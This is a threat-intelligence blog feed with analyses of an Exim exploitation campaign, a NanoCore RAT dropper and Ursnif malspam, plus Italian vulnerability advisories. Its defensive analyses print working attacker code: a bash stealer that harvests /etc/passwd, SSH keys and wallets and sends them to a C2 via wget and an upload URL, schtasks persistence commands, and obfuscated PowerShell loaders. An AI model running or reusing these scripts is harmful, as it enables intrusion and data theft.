The “Return of the WiZard” Vulnerability: Crooks Start Hitting

Introduction

Figure 1: Exposed EXIM server in Italy (Reference: ZoomEye)

In the past days, a really important issue has been disclosed to the public: “Return of the WiZard” vulnerability (ref. EW N030619, CVE-2019-10149). Such vulnerability affected a wide range of Exim servers, one of the main email server technologies, extremely diffused all around the globe and in Italy too.

Recently, cyber-criminals groups abused this vulnerability to compromise exposed Exim mail server in the wild. During this time, Cybaze-Yoroi ZLAB observed many attack attempts trying to spread malware abusing the CVE-2019-10149 issue, for instance the SSH reverse shell first spotted by Magni R. Sigurdsson (Security Researcher), which abuses ToR network to distribute its payload, or also the 9th June wave which tried to download a particular Linux agent. Yoroi-Cybaze ZLab analyzed this malware threat.

Figure 2: Tweet about first attack wave on Exim server

Technical Analysis

Exim is a message transfer agent (MTA) developed at the University of Cambridge for Unix systems connected to the Internet. It was designed on the assumption that it would be run on hosts that are permanently connected to the Internet. Thanks to the “Return of the WiZard” vulnerability, a malformed email sent to Exim servers allows attackers to execute code under the Exim process access level, root on most servers. The entire infection chain begins with an SMTP dialog containing a specifically crafted “RCPT_TO” field.

For instance:

Figure 3: Piece of exploit used to compromise vulnerable Exim server (Reference: https://github.com/dhn/exploits/tree/master/CVE-2019-10149)

At this point, the vulnerable Exim Server locally executes the crafted part.

The Bash Stealer

Hash1c8f184c3cf902bafc9df23b13a5d51cf801026bc3bde9d6b05cf047523ac6ed
ThreatBash Stealer
Brief DescriptionInitial bash payload dropped after Exim exploit
Ssdeep48:r+GMfper8pnPDA7pIgOznRsbb9tanhc6zghOk1Y2y6EYX+UDLBoySval:r+GMfp6ubEmZz6ig0vK

Table 1: Information about sh script

Figure 4: Initial SH file detection

The SH file is not merely a dropper of another stage of the malware. It retrieves information about the infected machine, starting from the hostname and ending into the bitcoin wallets and system configurations, making it look like a quite complete stealer too. In this section we deepen all the features of this sample.

#!/bin/shexport PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin:/usr/local/sbinexport LC_ALL=Cexport HISTFILE=/dev/nullexport HISTSIZE=0
HOME=/rootunset DISPLAYexport UPLOAD_URL=https://85.25.84[.99/up.php
NOLS=0NOETC=0NODUP=1V=2UF=temp3754r97y$V

Snippet 1: Declarations of global variables and IP of the C2

First of all, the script set different variables visible at all child processes thanks to “export” command. An interesting variable is “UPLOAD_URL” containing a first remote location “hxxps://85[.25.84.99/up[.php” part of the attacker infrastructure. The C2 is hosted by a German Managed Cloud Service Provider ️(PlusServer GmbH).

Second interesting part of the script is the function “snd()” defined follow.

snd () { sh -c "UPLOAD_FILE=\"$1\" UPLOAD_NAME=\"$(hostname).tbz2\" UPLOAD_URL=$UPLOAD_URL atd &"; }

Snippet 2: “snd()” function used to upload stolen information

This line of the script is one of the most important of all the infection chain. It launches a shell command with three exported variables “UPLOAD_FILE”, “UPLOAD_NAME”, “UPLOAD_URL” and then the “atd” file is executed. It is described in the section “The payload”. Instead, the final part of the script is:

# EXIM
tail -n 100 /etc/*release /etc/version > system.version  2>/dev/nullip addr > ip  2>/dev/nulliptables-save  > iptables  2>/dev/nullip6tables-save > ip6tables 2>/dev/null
# /EXIM end exim
hostname > hostnameuname -a > unameecho `date -u` '('`$(which date)`')' > dateuptime > uptimew > wid > id
ps auxwwwwwTH > psps auxwwwwwf  > ps-forestps auxwwwwwfe > ps-env
cat /proc/meminfo > meminfo 2>/dev/nullcat /proc/cpuinfo > cpuinfo 2>/dev/nullifconfig -a > ifconfig 2>/dev/nulldf > df 2>/dev/nulldmesg > dmesg 2>/dev/nullmount > mount 2>/dev/nullenv > env 2>/dev/null
lspci -k > lspci 2>/dev/nulllsusb > lsusb 2>/dev/null
netstat -antpuxwenW > netstat 2>/dev/nullroute -en > route 2>/dev/null
# other kernel info
cat /proc/modules > lsmod 2>/dev/nullcp /proc/version /proc/cmdline /proc/filesystems . 2>/dev/nulllscpu > lscpu 2>/dev/null
# copy stuff from /etc?
if [ $NOETC -eq 0 ]; then mkdir $main_dir/root/sysinfo/etc cd $main_dir/root/sysinfo/etc cp -pRL /etc/*release /etc/cron* /etc/*version /etc/issue* /etc/hosts* /etc/motd /etc/passwd /etc/apache2 /etc/httpd /etc/nginx /etc/resolv* /etc/wpa* . 2>/dev/null cd -fi
cd $main_dir/root
# list some dirs
if [ $NOLS -eq 0 ]; then ls -laR /boot > ls-boot 2>&1 ls -laR /etc  > ls-etc  2>&1fi
# compress n clean up
cd $main_dirtar -cj --exclude 'root/sysinfo/etc/httpd/modules*' --exclude 'root/sysinfo/etc/httpd/lib*' --exclude 'root/sysinfo/etc/httpd/man*' -f $BASE/rf root
# drop source files
rm -rf $main_dir &
# ready to send!
cd $BASE
wget -q http://173.212.214.137/se -O atd || wget -q http://173.212.214.137/icantgetit -O /dev/nulltest `stat -c %s atd` -eq 610932 && chmod +x atd && snd rf

Snippet 3: Piece of sh script utilized to grab all victim machine

In the “#EXIM” section the script gather the following information:  system version, ip, iptables status, ip6tables status. However, the “#EXIM” label is misleading because this piece of code refers only to information about the machine network configuration and no EXIM configuration is retrieved. After this, the script continues to gather other information like:

In the section labeled “#copy stuff from /etc?”, the script steals all the files stored in /etc/ path. Its loot is stored on “$main_dir/root/sysinfo/etc” where $main_dir is “/var/tmp”. It contains a copy of the whole Apache and Nginx configuration folders, and the system users and groups.

# copy stuff from /etc?
if [ $NOETC -eq 0 ]; then 
mkdir $main_dir/root/sysinfo/etc 
cd $main_dir/root/sysinfo/etc 
cp -pRL /etc/*release /etc/cron* /etc/*version /etc/issue* /etc/hosts* /etc/motd /etc/passwd /etc/apache2 /etc/httpd /etc/nginx /etc/resolv* /etc/wpa* . 2>/dev/null 
cd -
fi

Snippet 4: Copy of all files contained in /etc path

In addition, the following piece of code shows the script snippet able to steal cryptocoin wallets and to pillage other interesting files. For instance user’s ssh configs and configuration files of remote management tools, like Remmina, Rdesk and VNC potentially enabling further network compromise. Moreover, it gathers DB client configuration files for DbShell and Redis, along with user command history too.

cd $HOME && tar cf $main_dir/root/root.tar \ .*coin/w*dat .*Coin/w*dat .dash*/w*dat .dash*/*.conf .*coin/*.conf .*Coin/*.conf *address.txt \ *coin/w*dat *Coin/w*dat .vnc* .redis* .rdesk* .remmina \ /home/*/.*coin/w*dat /home/*/.dash*/w*dat /home/*/.dash*/*conf /home/*/.*Coin/w*dat /home/*/.*coin/*.conf /home/*/.*Coin/*.conf \ /home/*/.ssh /home/*/.remmina /home/*/.vnc* /home/*/.redis* /home/*/.rdesk* /home/*/.remmina \ /home/*/.bash* /home/*/.zsh* /home/*/.*hist* /home/*/.profile /home/*/.dbshell 2>/dev/null
cd $main_dir/root/

Snippet 5: Grab of all information on ssh, remmina, vnc, redis and rdesk configuration files.

Finally, all these information are compressed, sent to the C2 using the previously mentioned “snd()” function and then removed from the machine. The last lines of the script downloads another piece of malware: an ELF32 executable hosted on the same server at  “hxxp://173[.212.214[.137/se”. It  is the “atd” file referenced in the “snd()” function.

The ELF Uploader

Hashd8a787dc774748bf26e3dce1b079e9bef071c0327b6adcd8cc71ed956365201c
ThreatELF Uploader
Brief DescriptionMalware downloaded after exim exploitation packed with UPX compressor
Ssdeep12288:FyqFENCHmitUVm9Q8vvsOjIE7WmUlwUJoAAxgeB2DMX+H0XxDTcKe+DduDkEbAd+:FyqusHBWEQ8vk

Table 2: Information about se (ELF file packed with UPX)

This sample was compressed with the standard UPX compressor. The unpacked payload is:

Hashb4bae03ab71439208b79edfc5eaec42babacee982231dce001b70ec42835063a
ThreatELF Uploader unpacked
Brief DescriptionELF Uploader unpacked
Ssdeep49152:VZSOaCFC/z4Amq7DkCteu3VD69+xA1PbHrmFbTZJy:VotCFC/zoq0CguZs5LrmFPy

Table 3: Information about se (ELF file Unpacked)

Analyzing it, we found the malware tries to find three environment variables: “UPLOAD_FILE”, “UPLOAD_NAME” and “UPLOAD_URL”. All those have been declared in the “snd()” function and are used as parameters for the further execution, suggesting this piece of code may be a custom tool prepared by the attacker.

Figure 5: Evidence of “UPLOAD_FILE”, “UPLOAD_NAME” and “UPLOAD_URL” functions

If the three parameters exist, then the malware contacts the remote destination in order to upload all the data through a series of POST request to the “/up.php” resource.  As previously mentioned, the three parameters are read as environment variable in the bash command line. So, once loaded the required parameters, we are able to  correctly debug the malware. In the figure above, we reported how the malware retrieves one of the defined parameters, the “/var/tmp/temp3754r97y2” folder, which contains the loot gathered by the Bash Stealer. Indeed, Figure 12 shows the routine used by the malware to contact the C2 and it is visible in clear in the address pointed by the ESI register.

Figure 6: Read parameter routine
Figure 7: Read C2 address routine

Conclusion

This attack wave shows how  simple can be for an attacker to run a widespread attacks with customized malware, threatening all the unpatched Exim services exposed all around the Internet. In this analysis, we encountered an effective information stealer able to easily gather sensitive information about the compromised system. These information could also enable the crooks behind the campaign to further escalate the attack within victims and victim partners networks.

Anyway, this case represents only one possible attack scenario abusing the “Return of the WiZard” vulnerability: cryptominers, botnets or also ransomwares could also leverage this weakness, along with APT groups. So, the Yoroi-Cybaze researchers recommend to update Exim servers in order to avoid the risk of other attack waves.

Indicator of Compromise

Yara Rule

rule EXIM_CVE_2019_10149 {
meta:
description = "Yara Rule EXIM UPX and de-UPX"
   	author = "Cybaze - Yoroi ZLab"
   	last_updated = "2019-06-19"
   	tlp = "white"
   	category = "informational"
strings:
    	$s1 = "ELF"
    	$s2 = "Buildroot 2014.02"
   	$s3 = "445403338652341"
    	$s4 = {96 0E 14 41 C3 0E 10 44 C6}
    	$s5 = {5C 24 0C 01 E9 8A 0C 01 32 4C}  
    	$s6 = "OpenSSL 1.0.1f 6 Jan 2014"  
    	$s7 = {0E 14 41 C3 0E 10}
    	$s8 = {5E CC 14 D8 E1 48 BF 7E 6D}
    	$s9 = {FF 83 A7 24 01 00 00 FD}
    	$s10 = "UWVSQ"
    	$s11 = {C1 0A CF 0A D9 0A E5}
    	$a12 = "UPX"
    	$a13 = {22 00 1A 03 00 2A A2}
    	$a14 = {55 06 3C 3C BA 4D E9 C6}
    	$a15 = {0B 58 A6 9E 88 BD 51 C1 22}
    	$a16 = {67 2A 21 57 23 3B 29}
   	$a17 = {F5 6F D7 CD 6D 28 1F 49}
    	$a18 = {66 FA A4 B5 78 F0 24 C3}
    	$a19 = {8E 82 07 8D 05 53 80 29}
    	$a20 = {9B 1C B7 E4 57 93 35 8F 7A}
    	$a21 = {47 8F 7E 4D 0B 24 8C 7D}
   	 
condition:
    $s1 and 4 of ($s*) or $s1 and 5 of ($a*)
}

This blog post was authored by Davide Testa, Luigi Martire and Luca Mella of Cybaze-Yoroi Z-LAB

Nuova Vulnerabilità in Oracle WebLogic

Proto: N080619.

Con la presente Yoroi desidera informarLa riguardo ad una grave vulnerabilità all’interno di Oracle WebLogic, alla base di numerose applicazioni e portali web enterprise fondati su tecnologia Java. La criticità è nota con l’identificativo CVE-2019-2729 ed è legata alla precedente CVE-2019-2725.

A causa di lacune di validazione degli input utente durante le fasi di deserializzazione nel componente "XMLDecoder" di WebLogic Server Web Services, un attaccante remoto può eseguire codice arbitrario sulla macchina bersaglio senza alcuna autenticazione.

Il Vendor ha rilasciato un apposito bollettino di sicurezza nel quale risultano afflitte le versioni Oracle WebLogic Server 10.3.6.0.0, 12.1.3.0.0 e 12.2.1.3.0, rendendo disponibili aggiornamenti atti a risolvere la problematica.

Per via della disponibilità di dettagli tecnici relativi alla problematica, trattasi infatti di una variante a problematiche già note (e.g. EW N030419), del suo sfruttamento in attacchi di rete e della potenziale esposizione dei servizi afflitti, Yoroi consiglia di pianificare l’applicazione delle patch di sicurezza disponibili qualora Oracle WebLogic fosse in uso presso il Vostro parco macchine server.

Yoroi consiglia infine di mantenere alto il livello di consapevolezza degli utenti, avvisandoli periodicamente delle minacce in corso e di utilizzare un team di esperti per salvaguardare la sicurezza del perimetro "cyber". Per avere un indice di minaccia in tempo reale si consiglia di visitare il seguente link: Yoroi Cyber Security Index

Attacchi 0-Day su Mozilla Firefox

Proto: N070619.

Con la presente Yoroi desidera informarLa riguardo ad una grave vulnerabilità all’interno di Mozilla Firefox, secondo web browser più utilizzato al mondo, diffuso anche in ambienti Enterprise e SMB. La criticità è nota con l’identificativo CVE-2019-11707.

A causa di lacune nella gestione dei tipi di dato nel motore JavaScript del browser, attaccanti remoti sono in grado di eseguire codice arbitrario sulla macchina vittima a seguito della sola navigazione su portali compromessi o malevoli. Tale circostanza può essere sfruttata in attacchi opportunistici basati su “Malvertising” od in campagne di attacco mirate con schemi di tipo “Watering-Hole”.

Il Manutentore ha rilasciato il bollettino di sicurezza MFSA2019-18, indicando come afflitte le versioni Firefox minori di 67.0.3 e Firefox ESR minori di 60.7.1, specificando inoltre di essere a conoscenza di attacchi in corso che stanno abusando di questa vulnerabilità. Per tale ragione, Yoroi consiglia di applicare gli aggiornamenti Firefox disponibili al Vostro parco macchine client.

Yoroi consiglia infine di mantenere alto il livello di consapevolezza degli utenti, avvisandoli periodicamente delle minacce in corso e di utilizzare un team di esperti per salvaguardare la sicurezza del perimetro "cyber". Per avere un indice di minaccia in tempo reale si consiglia di visitare il seguente link: Yoroi Cyber Security Index

Importanti Vulnerabilità in Kernel Linux “SACK Panic”

Proto: N060619.

Con la presente Yoroi desidera informarLa riguardo alla recente scoperta di importanti vulnerabilità all’interno delle famiglie di sistemi operativi Linux e FreeBSD, diffusi in ambienti Cloud, Enterprise, SMB ed all’interno di Prodotti e Soluzioni software di terze parti. Le criticità sono note con gli identificativi CVE-2019-11477 e CVE-2019-11478.

A causa di lacune nella gestione della memoria nelle funzionalità Selective Acknowledgement (SACK) dello stack-TCP di sistema, un attaccante di rete può causare gravi rallentamenti, disservizi e crash di sistema semplicemente inviando una particolare sequenza di pacchetti con appositi Maximum Segment Size verso la macchina bersaglio.

Apposite patch di sicurezza sono state rilasciate per versioni kernel Linux maggiori o uguali a 2.6.29 relativamente a “SACK Panic” (CVE-2019-11477), e versioni minori di 4.15 in riferimento a “SACK Slowness” (CVE-2019-11478). Le patch sono state inoltre recepite da vari Vendor e Manutentori di sistemi operativi linux-based, ad esempio Red-Hat, SuSE, Oracle, Amazon, Debian.

Considerato il potenziale impatto di eventuali attacchi volti allo sfruttamento di questa vulnerabilità, diffusione e potenziale esposizione delle tecnologie afflitte, Yoroi consiglia di pianificare l’applicazione delle patch disponibili e di monitorare la disponibilità di aggiornamenti su tecnologie e soluzioni linux-based di terze parti.

Yoroi consiglia infine di mantenere alto il livello di consapevolezza degli utenti, avvisandoli periodicamente delle minacce in corso e di utilizzare un team di esperti per salvaguardare la sicurezza del perimetro "cyber". Per avere un indice di minaccia in tempo reale si consiglia di visitare il seguente link: Yoroi Cyber Security Index

Dissecting NanoCore Crimeware Attack Chain

Introduction

Historically, cyber-criminals adopted one or more layers of encryption and obfuscation to lower their footprint and avoid detection. The usage of cryptors and packers has become a commodity in the contemporary malware landscape, providing the so called “FUD” (Fully UnDetectable) capabilities to malicious code and allowing the outsourcing of the payload hiding.

The CSDC monitoring operations spotted a particular sample of the famous Nanocore Remote Administrator Tools (RAT). In this specific case, a Delphi wrapper was used to protect the RAT. Thus, Cybaze-Yoroi ZLab decided to analyze this threat.

Technical Analysis

Nanocore RAT is a “general purpose” malware with specific client factories available to everyone and easily accessible. During our cyber-defense activities we discovered attack attempts against Italian companies operating in the Luxury sector. For instance, we intercepted malicious email claiming to come from a well known Italian Bank and then we started to analyze it.

Figure 1: Part of initial e-mail

The attachment looks like a 7z archive file containing a valid PE file with Adobe Acrobat icon. Trivial trick used to lure ingenuous users to believe that it is a legit PDF file. However, it contains a PE executable:

Hash8274313b5b1e941a67b54e9f311094f2f56a3afe97820ad03560d9885a60b71b
ThreatNanocore RAT wrapper
Brief DescriptionDelphi Language Wrapper for Nanocore RAT
Ssdeep24576:FZ8elMYdWD7yWQ5/It6OxPtNHApfqGwcblA8:FyYEvt6OxPTHAgJcblA8
Icon

Table 1: Static info about Nanocore dropper/NanoCore RAT

Then we extracted some static information on the sample:

Figure 2: Information about “trasferimento.exe” dropper/NanoCore RAT

The sample was compiled with “BobSoft Mini Delphi” compiler and two characteristics are significant: the first one is the high level of entropy, this leads us to think that the sample was somehow packed; the second one is the absolutely fake compilation timestamp of the executable.

Executing the malware, we notice the presence of some checks performed by the malware in order to evade analysis boxes.

Figure 3: Processes checked by malware

In the above figure, are shown some processes checked by the malware. This action is performed through the usage of the classical Win32 API calls “CreateToolhelp32Snapshot” and “Process32Next”.

Figure 4: API calls to check open tools

If no one of the checked processes is active, the malware can proceed with the real infection: it writes the real payload of Nanocore RAT in the “%TEMP%” folder.

Figure 5: NanoCore payload written by the loader and relative API calls

The interesting thing is the payload, that is further loaded into memory, is merely embedded inside a resource without any encryption or obfuscation.

Figure 6: Comparison between payload embedded in resource of “trasferimento.exe” sample and “non.exe” written in %TEMP% folder

As shown in the above figure, the “trasferimento.exe” Delphi wrapper has got a lot of embedded resources (as visible on the left), and one of them contains the entire Nanocore RAT payload. On the right, there is a diff analysis of the resource named “2035” and the actual payload triggered on the victim machine. The resource “2035” has a sort of header (highlighted in yellow, on the left upper corner), which contains the name of the payload to implant on the machine “non.exe”. The succeeding piece of code is identical, without any protection. The “trasferimento.exe” component runs a scheduled task in order to guarantee its persistence.

Figure 7: Task-scheduler set by malware

At this point the malware creates a xml file with a pseudo-random name containing the configuration for its persistence on the machine. After creating this file, the malware spawns the “non.exe” process and then re-spawn itself through the following command lines.

schtasks.exe" /create /f /tn "IMAP Subsystem" /xml "C:\Users\admin\AppData\Local\Temp\tmpC5A7.tmp"schtasks.exe" /create /f /tn "IMAP Subsystem" /xml "C:\Users\admin\AppData\Local\Temp\tmpCB59.tmp"

The body of the xml configuration file is the following:

<?xml version="1.0" encoding="UTF-16"?><Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">  <RegistrationInfo />  <Triggers />  <Principals>    <Principal id="Author">      <LogonType>InteractiveToken</LogonType>      <RunLevel>HighestAvailable</RunLevel>    </Principal>  </Principals>  <Settings>    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>    <AllowHardTerminate>true</AllowHardTerminate>    <StartWhenAvailable>false</StartWhenAvailable>    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>    <IdleSettings>      <StopOnIdleEnd>false</StopOnIdleEnd>      <RestartOnIdle>false</RestartOnIdle>    </IdleSettings>    <AllowStartOnDemand>true</AllowStartOnDemand>    <Enabled>true</Enabled>    <Hidden>false</Hidden>    <RunOnlyIfIdle>false</RunOnlyIfIdle>    <WakeToRun>false</WakeToRun>    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>    <Priority>4</Priority>  </Settings>  <Actions Context="Author">    <Exec>      <Command>"C:\Users\admin\Desktop\trasferimento.exe"</Command>      <Arguments>$(Arg0)</Arguments>    </Exec>  </Actions></Task>

The difference between the two scheduled tasks is the fact that one references “trasferimento.exe” process and the other one references “non.exe” process. It seems to be a sort of a survival mechanism in which both the processes work and keep the infection alive.

Figure 8: Details about set task scheduler

These two processes contact two different C2s. During the analysis one of them (185.244.31.[50)  was down and the other one (79.134.225[.41) continues to work.

Figure 9: Communication with two different C2

NanoCore Client

Hash52d73eee176a2ff30af7e386809b94ef1c4918f131f8de1e2b66915ab8cc3790
ThreatNanocore RAT
Brief DescriptionNanoCore RAT client
Ssdeep6144:MLV6Bta6dtJmakIM5u8GL+1WUQ52F+/8Ej4eg:MLV6BtpmkqGLUcQsEEj4h

Table 2: Information about “non.exe” NanoCore RAT

At this point, let’s start to analyze the “non.exe” file which is the Nanocore RAT Client, even this one is compiled in .NET language.

Figure 10: Other information about “non.exe” NanoCore RAT and relative compiled language

The de-compiled code is quite obfuscated and encrypted with some custom routines.

Figure 11: Version of NanoCore Client

The real nature of the payload is revealed after few steps of debugging, we extracted also the current version: 1.2.2.0, as highlighted in the red square. Going ahead with debugging, we found  a recurrent routine used to decrypt RAT's static strings and the malware configuration too:

Figure 12: Decryption routine to extract the configuration file

Like other crimeware, also this one leverages encrypted configuration only decrypted during the malware execution. Interestingly, the extracted configuration does not include persistence, which is however guaranteed by the scheduled task handled by the external wrapper.

Figure 13: Configuration information of the RAT client

As we can see from the above figure, this client has some interesting enabled features, like the capability to bypass the UAC control, or prevent the system to go to sleep. Moreover, the primary and backup C2 are the same and the solution of the backup C2 is guaranteed through the other “trasferimento.exe” RAT mode process.

Conclusion

Nowadays a lot of cyber criminals don’t strive to write malware from scratch because there already are a vastity of public tools suitable for this need. From the attacker point of view, the problem about the usage of these tools is the fact they sooner or later will be recognized by the Anti-Virus engines.

Therefore, attackers adopt other technologies like packers and obfuscators, many time publicly available too, or write down custom loaders to hide their espionage tools, keeping them running into victim machines for a long time, silently observing their targets and awaiting the right time to act their criminal plans.

Indicators of Compromise

Yara Rule

import "pe"
rule Delphi_Loader_NanoCoreRAT {
meta:
    	description = "Yara Rule for Delphi Loader and embedded NanoCore RAT"
    	author = "Cybaze - Yoroi ZLab"
    	last_updated = "2019-06-12"
    	tlp = "white"
    	category = "informational"
strings:
$s1 = "IE(AL(\"%s\",4),\"AL(\\\"%0:s\\\",3)\",\"JK(\\\"%1:s\\\",\\\"%0:s\\\")\")"
$a1 = "#=qP05CRmbt2pJg10eRU50wu1vx$mfteEn$pCn9SEbehP8="
    	$a2 = "NanoCore"
    	$a3 = {69 73 34 31 74 49 58 4D}
    	$b1 = "<*t\"<0r=<9w9i"

condition:
pe.number_of_resources == 73 and $s1 or 1 of ($a*) and $b1
}

This blog post was authored by Davide Testa, Luigi Martire and Antonio Pirozzi of Cybaze-Yoroi Z-LAB

Importanti Vulnerabilità in Switch Industriali WAGO

Proto: N050619.

Con la presente Yoroi desidera informarLa riguardo al recente rilevamento di importanti vulnerabilità negli Switch Industriali WAGO, diffusi in ambito manifatturiero, trasporti, in produzioni di processo, packaging ed in soluzioni di building automation. Le criticità sono note con gli identificativi CVE-2019-12550 e CVE-2019-12549.

Analisi condotte da terze parti hanno rivelato la presenza di gravi lacune di sicurezza all’interno dei firmware WAGO, dove sono presenti utenze privilegiate preconfigurate e chiavi private hard-coded fruibili attraverso sessioni SSH e Telnet. La presenza di queste backdoor amministrative pone uno scenario di rischio non trascurabile per le organizzazioni che utilizzano gli switch industriali in oggetto, esponendo eventuali infrastrutture e reti di processo a potenziali modifiche non autorizzate da parte di insider ed attaccanti di rete.

Il Produttore ha confermato le problematiche rilasciando opportuni aggiornamenti firmware per gli switch industriali afflitti dalle problematiche, nel dettaglio:

A questo proposito, per via della potenziale criticità degli apparati afflitti e della disponibilità di dettagli tecnici relativi alle problematiche, Yoroi consiglia di pianificare l’applicazione degli aggiornamenti firmware disponibili e di limitare quanto più possibile la visibilità di rete di tali dispositivi.

Yoroi consiglia infine di mantenere alto il livello di consapevolezza degli utenti, avvisandoli periodicamente delle minacce in corso e di utilizzare un team di esperti per salvaguardare la sicurezza del perimetro "cyber". Per avere un indice di minaccia in tempo reale si consiglia di visitare il seguente link: Yoroi Cyber Security Index

How Ursnif Evolves to Keep Threatening Italy

Introduction

For months the Italian users have been targeted by waves of malspam delivering infamous Ursnif variants. Yoroi-Cybaze ZLab closely observed these campaigns and analyzed them to track the evolution of the techniques and the underlined infection chain, noticing an increasing sophistication. For instance the latest waves increased their target selectivity abilities by implementing various country-checks and their anti-analysis capabilities through heavy code obfuscation.

In our previous post, we enumerated the delivery methods and the principal TTPs of the attackers behind the Ursnif mlaware threat. Indeed, in this report we’ll describe the increasing complexity of more recent infection chains, counting more than ten level of obfuscation in addition to a new steganography technique designed for Windows 10 machines.

Technical Analysis

Hashc86d3ab048976eb70d64409f3e7277ec40d6baf9ba97bcf4882e504fb26b5164
ThreatMicrosoft Excel malicious document
Brief DescriptionMalicious macro
Ssdeep1536:9n1DN3aMePUKccCEW8yjJTdrBZq8/Ok3hOdsylKlgryzc4 bNhZFGzE+cL2knA5xG:9n1DN3aM+UKccCEW8yjJTdrBZq8/Ok3B

Table 1: Static info about the Ursnif Dropper

The attackers are still leveraging malicious Excel documents to lure their targets to start  the infection chain, which are required to enable the macro code hidden inside these kind of vectors.

Figure 1: Fake screen to convince the user to enable the macro (on the left) and the hidden payload (on the right)

Once opened, a fake obfuscated image invites the victim to enable the content in order to start the malicious macro (as shown in Figure 1 on the left). However, moving the blurred  figure away reveals the cell A1 contains hidden code: its content is a Base64 encoded script.

Figure 2: Snippet of the macro code

As shown, the macro retrieves the content from the first cell of the document and it subsequently concatenates it with the content of the six rows below the first one. Its execution starts the “powershell stage” of the infection: a long series of multi-layered obfuscated scripts.

powershell.exe -EP bYpass IEx ('$w='OBFUSCATED PAYLOAD ZERO';$v=[IO.COmpresSIon.comPresSiONmOde];$j=20*60;sal M neW-OBJeCt;$e=[TexT.ENcoDiNG]::ASCiI;(M io.sTreAmreAdER((M Io.coMPREsSIoN.dEfLatesTReam([Io.meMORySTrEam][CoNVERt]::FRomBase64STRINg($w),$v::decOMpREss)),$e)).reaDTOEnD()|&($PshOME[4]+$PshoMe[34]+''x'')')

Code Snippet 1

The Powershell Stage

In the first layer we noticed the declaration of the variable “$j”, used in the next step of the obfuscation to delay the execution of the script through Sleep library function invocations:

$b='i'+$sHeLlid[13]+'X';if ([Environment]::OSVersion.Version.Major -ne '10') {Sleep $j;.($b)(M sYSTEm.Io.CoMpresSiOn.DEFlatestReam([sySTeM.Io.MeMoRYsTREAm] [cOnveRt]::FrOMbASe64stRinG(' OBFUSCATED PAYLOAD ONE '),$v::DecOMprESs)|%{M syStEM.Io.sTReAmrEADEr($_,[TexT.ENcoDiNG]::ASCIi)}).READtoenD()}else {$h='[email protected]( OBFUSCATED PAYLOAD TWO )'.replace('c',',0,');$h=$h.replace('b',',101,');$h=$h.replace('a',',0,0,0,');.($b)($h);[Reflection.Assembly]::Load([byte[]]$y)|Out-Null;.($b)([SA.Sii]::pf())}

Code snippet 2

The interesting peculiarity of this stage is the check for Windows version installed on the victim machine. The highlighted code shows an “if” condition to choose which branch of the infection chain should be executed. If the target version is not Windows 10, the malware runs the content of “OBFUSCATED PAYLOAD ONE” (the other branch is discussed on "The Windows 10 Branch" section) . Digging into the "payload one" branch, the next step is:

&("{1}{0}" -f'x','IE') ((('.(D'+'Nn'+'{0'+'}{1'+'}DN'+'n-f'+("{0}{1}"-f ' fI','Qs')+("{0}{1}"-f 'fIQ',',')+("{0}{1}" -f'fIQ','a')+("{0}{1}"-f'lfI','Q')+((("{0}{1}{2}" -f ')',' Dfi i','ex')))+';.'+'('+'DNn{0}{'+'1}DNn'+' '+'-f'+'fI'+("{0}{3}{2}{1}" -f 'QS','Q','Q,fI','afI')+'lf'+((("{0}{2}{1}"-f'I','L n','Q) ')))+'e'+("{2}{1}{0}"-f';','t','w-objeC')+'f'+'1'+'e{c'+'1}=(('+'(DN'+'n{'+'6'+'}'+'{3}'+'{10}'+'{'+'4}{8}{'+'5'+'}{'+'2'+'}{11'+'}{'+'1}{9}{0'+'}{7}DNn -f fIQ'+'w'+'f'+("{0}{2}{1}{3}" -f'IQ,f','awfI','IQ','Q,fI')+("{2}{1}{0}"-f' ','me','QNa')+'Df'+'I'+("{0}{1}" -f'Q,','fIQ')+'dd'+("{0}{1}"-f'-T','fI')+("{1}{0}"-f 'Q','Q,fI')+'-Af'+'IQ,'+("{1}{0}" -f 'Qb','fI')+("{0}{1}{2}" -f'l','yfIQ,','fIQA')+("{1}{0}"-f ',f','fIQ')+'IQ'+("{0}{1}"-f';f','IQ,')+'f'+'I'+("{1}{0}" -f'sse','Q')+("{0}{1}{2}" -f 'm','fI','Q,fIQi')+'n'+("{1}{0}" -f'D6fI','g')+("{1}{0}" -f ',fIQype','Q')+("{0}{1}" -f ' ','fIQ')+','+("{0}{1}"-f 'fIQ','6wSyst')+("{0}{2}{1}" -f 'em.D','f','r')+((("{1}{3}{2}{0}"-f 'reS1ZP','IQ)).D','n','N')))+'L'+((("{1}{0}{2}" -f 'C','A','eDNn(([')))+("{1}{2}{3}{0}" -f 'A','ChA','r]68+','[Ch')+'r]'+("{0}{1}" -f '54','+[')+("{1}{0}" -f'1','ChAr]1')+'9'+'),['+'sT'+'ri'+("{1}{0}"-f'][C','NG')+'hA'+("{0}{1}" -f'r]','39')+'));'+'f1e{c2}'+'='+'f'+'I'+("{1}{0}"-f'f1e','Q')+'tm'+'=f'+'IQ'+("{1}{0}" -f'h','fIQ')+'t'+("{0}{1}" -f'tps:','/')+("{1}{0}" -f 'ima','/')+'ges'+("{0}{1}"-f '2.imgb','o')+'x'+'.c'+'o'+'m/d'+'8'+("{1}{2}{0}"-f'u','/0','e/eyGV')+'p7s'+'_o.'+("{1}{0}" -f'fIQ','pngfIQ')+';f'+'1e'+'r'+'y ='+("{0}{1}" -f' [Sys','te')+'m.N'+("{1}{0}"-f'ebR','et.W')+'equ'+'es'+("{0}{1}{2}"-f 't',']::','Creat')+((("{0}{1}" -f 'e(','f1e')))+'t'+'m);'+("{0}{1}" -f 'f1','ery')+'.Me'+("{1}{0}" -f 'od =','th')+' f'+'I'+'QfI'+'QH'+("{0}{1}" -f'E','ADf')+("{1}{2}{0}"-f ';f1','IQ','fIQ')+'e'+'ra'+' '+'= f'+("{0}{1}" -f '1e','ry.')+'G'+'etR'+'es'+("{0}{1}" -f 'pon','s')+("{1}{2}{0}"-f 'g','e(',');f1e')+'='+'L '+'Sy'+'st'+'e'+'m'+'.'+'D'+'ra'+((("{4}{3}{2}{0}{1}"-f'm','ap((','t','g.Bi','win')))+'L'+' '+("{1}{2}{0}" -f'ebC','Net.','W')+((("{2}{1}{3}{0}" -f'.Ope','ien','l','t)')))+'n'+'Rea'+((("{1}{0}{2}" 